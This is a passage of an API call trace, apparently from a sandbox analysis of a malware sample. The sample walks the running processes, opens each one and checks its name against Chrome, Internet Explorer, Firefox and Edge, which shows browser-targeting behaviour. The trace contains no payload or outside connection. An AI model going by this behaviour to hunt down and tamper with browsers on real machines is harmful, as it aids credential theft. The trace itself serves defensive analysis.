	[0253.162] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0253.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.162] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.163] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0253.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.163] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.163] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0253.164] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xa83c
	[0253.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.164] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0253.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.164] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.165] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0253.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.165] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.165] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0253.166] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xa840
	[0253.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.166] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0253.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.166] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.167] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0253.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.167] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.167] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0253.168] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xa844
	[0253.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.168] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0253.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.168] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.169] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0253.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.169] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.169] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0253.170] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xa848
	[0253.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.170] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0253.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.170] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.171] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0253.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.171] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.171] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0253.172] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xa84c
	[0253.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.172] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0253.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.173] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.173] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0253.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.173] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.174] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0253.174] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xa850
	[0253.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.175] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0253.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.175] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.175] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0253.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.176] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.176] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0253.176] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xa854
	[0253.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.177] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0253.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.177] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.177] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0253.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.177] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.178] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.178] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xa858
	[0253.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.178] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.179] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.179] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.179] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.180] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.180] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xa85c
	[0253.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.181] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.181] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.181] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.181] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.182] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.182] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xa860
	[0253.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.183] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.183] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.183] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.184] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.184] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.184] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xa864
	[0253.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.185] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.185] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.185] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.186] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.186] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.187] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xa868
	[0253.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.187] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.187] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.187] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.188] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.188] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.189] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xa86c
	[0253.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.189] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.189] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.190] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.190] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.190] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.191] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xa870
	[0253.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.191] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.191] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.192] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.192] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.192] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0253.193] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xa874
	[0253.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.194] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0253.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.194] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.195] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0253.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.195] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.195] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.196] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xa878
	[0253.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.197] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.197] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.197] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.198] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.198] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0253.198] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xa87c
	[0253.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.199] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.199] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.199] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.200] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.200] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0253.201] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xa880
	[0253.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.201] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0253.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.201] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.201] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0253.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.202] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.202] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.203] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xa884
	[0253.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.203] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.203] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.203] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.204] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.204] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0253.249] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xa888
	[0253.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.250] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0253.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.250] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.250] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0253.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.251] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.251] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0253.252] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xa88c
	[0253.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.252] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0253.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.252] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.253] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0253.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.253] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.253] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0253.254] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xa890
	[0253.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.255] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0253.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.256] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.256] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0253.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.257] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.257] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0253.258] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xa894
	[0253.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.258] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0253.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.258] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.259] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0253.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.259] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.259] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0253.260] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0253.260] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0253.261] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xa898
	[0253.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.261] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0253.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.262] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.262] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0253.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
